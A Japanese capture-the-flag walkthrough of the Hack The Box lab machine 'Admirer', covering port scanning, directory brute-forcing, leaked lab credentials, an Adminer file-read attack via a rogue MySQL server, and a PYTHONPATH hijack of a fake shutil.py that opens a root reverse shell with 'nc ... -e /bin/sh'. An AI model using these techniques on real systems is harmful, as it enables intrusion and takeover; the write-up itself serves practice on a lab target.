AdmirerはLinuxのマシンで、難易度はeasyです。
・使用ツール
gobuster
目次
1.Enumeration
Autoreconを実行してオープンポートを確認
ftp,ssh,httpのサービスを利用していることを確認
nmapの結果から、「/admin-dir」のディレクトリがあることがわかる
# Nmap 7.91 scan initiated Mon Dec 28 02:45:35 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /results/10.10.10.187/scans/_full_tcp_nmap.txt -oX /results/10.10.10.187/scans/xml/_full_tcp_nmap.xml 10.10.10.187
Nmap scan report for 10.10.10.187
Host is up, received user-set (0.16s latency).
Scanned at 2020-12-28 02:45:35 UTC for 405s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 62 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 62 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaQHjxkc8zeXPgI5C7066uFJaB6EjvTGDEwbfl0cwM95npP9G8icv1F/YQgKxqqcGzl+pVaAybRnQxiZkrZHbnJlMzUzNTxxI5cy+7W0dRZN4VH4YjkXFrZRw6dx/5L1wP4qLtdQ0tLHmgzwJZO+111mrAGXMt0G+SCnQ30U7vp95EtIC0gbiGDx0dDVgMeg43+LkzWG+Nj+mQ5KCQBjDLFaZXwCp5Pqfrpf3AmERjoFHIE8Df4QO3lKT9Ov1HWcnfFuqSH/pl5+m83ecQGS1uxAaokNfn9Nkg12dZP1JSk+Tt28VrpOZDKhVvAQhXWONMTyuRJmVg/hnrSfxTwbM9
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNHgxoAB6NHTQnBo+/MqdfMsEet9jVzP94okTOAWWMpWkWkT+X4EEWRzlxZKwb/dnt99LS8WNZkR0P9HQxMcIII=
| 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqp21lADoWZ+184z0m9zCpORbmmngq+h498H9JVf7kP
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Linux 3.2 - 4.9 (93%), Linux 3.16 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/28%OT=21%CT=1%CU=30550%PV=Y%DS=3%DC=T%G=Y%TM=5FE948
OS:64%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%TS=8)OPS(O1=
OS:M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7
OS:%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y
OS:%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D
OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.006 days (since Mon Dec 28 02:44:06 2020)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 0.03 ms 172.17.0.1
2 161.20 ms 10.10.14.1
3 161.42 ms 10.10.10.187
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
gobusterで/admin-dirのディレクトリを探索する
$ sudo gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -o gobuster -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/admin-dir
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2021/01/03 03:39:24 Starting gobuster
===============================================================
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2021/01/03 03:51:28 Finished
===============================================================
「credentials.txt」にアクセスすると、認証情報を取得
$ curl http://10.10.10.187/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!
2.Exploitation
取得した認証情報でFTPにログイン
ftpuser
%n?4Wz}R$tTF7
dump.sql,html.tar.gzのファイルを取得
$ sudo ftp 10.10.10.187
[sudo] password for kali:
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.
ftp> mget dump.sql
mget dump.sql? yes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.00 secs (31.8359 MB/s)
ftp> mget html.tar.gz
mget html.tar.gz? yes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 8.67 secs (593.5189 kB/s)
ftp> exit
221 Goodbye.
「html.tar.gz」を解凍すると、「utility-scripts」のフォルダが生成される。「utility-scripts」配下のディレクトリを列挙すると「adminer.php」があり、Adminerのバージョンが表示されている。
使用しているバージョンには、ファイルインクルードの脆弱性がある。
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
mysqlのサービスを起動し、データベースを作成する
sudo mysql -u root -p “”
create database admirer;
use admirer;
create table exploit (file VARCHAR(1000));
$ sudo systemctl start mysql
$ sudo mysql -u root -p ""
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 52
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB []> create database admirer;
Query OK, 1 row affected (0.000 sec)
MariaDB []> use admirer;
Database changed
MariaDB [admirer]> create table exploit (file VARCHAR(1000));
Query OK, 0 rows affected (0.017 sec)
外部からもアクセスできるように、bind-addressを変更する
$ cat /etc/mysql/mariadb.conf.d/50-server.cnf | grep bind-address
#bind-address = 127.0.0.1
bind-address = 0.0.0.0
mysqlのサービスを再起動
$ sudo systemctl restart mysql
アクセス拒否されたので、権限を付与する
CREATE USER ‘root’@’10.10.10.187’ IDENTIFIED BY ”;
GRANT ALL PRIVILEGES ON . TO ‘root’@’10.10.10.187’;
FLUSH PRIVILEGES;
$ sudo mysql -u root -p ""
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB []> CREATE USER 'root'@'10.10.10.187' IDENTIFIED BY '';
Query OK, 0 rows affected (0.001 sec)
MariaDB []> GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.10.10.187';
Query OK, 0 rows affected (0.001 sec)
MariaDB []> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.001 sec)
情報を入力してログインする。
コマンドを実行し、MySQLデータベース「adminer」の「exploit」テーブルにデータを送る
load data local infile ‘/var/www/html/index.php’
into table admirer.exploit
fields terminated by “\n”
送ったデータの中身を確認すると認証情報が確認できる
sshでログインする
3.Privilege Escalation
sudo -lコマンドを実行すると、「/opt/scripts/admin_tasks.sh」があることを確認
$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
「admin_tasks.sh」実行時にオプションの指定ができ、「6」を選択すると、「/opt/scripts/backup.py」を実行するようになっている
$ cat /opt/scripts/admin_tasks.sh
#!/bin/bash
...
backup_web()
{
if [ "$EUID" -eq 0 ]
then
echo "Running backup script in the background, it might take a while..."
/opt/scripts/backup.py &
else
echo "Insufficient privileges to perform the selected operation."
fi
}
...
「/opt/scripts/backup.py」の中身を確認すると、「make_archive」関数が存在する。
$ cat /opt/scripts/backup.py
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
「make_archive」関数を上書きすることで、特権エスカレーションができる。
shutil.py
import os
def make_archive(dst,gztar,src):
os.system('nc 10.10.14.3 4444 -e "/bin/sh"')
スクリプトを実行して、オプションは6を選択する。
waldo@admirer:~$ cd /tmp/
waldo@admirer:/tmp$ vi shutil.py
waldo@admirer:/tmp$ cat shutil.py
import os
def make_archive(dst,gztar,src):
os.system('nc 10.10.14.3 4444 -e "/bin/sh"')
waldo@admirer:/tmp$ sudo PYTHONPATH=/tmp/ /opt/scripts/admin_tasks.sh
[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp$
管理者権限でリバースシェルが取得できる
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.187] 58766
id
uid=0(root) gid=0(root) groups=0(root)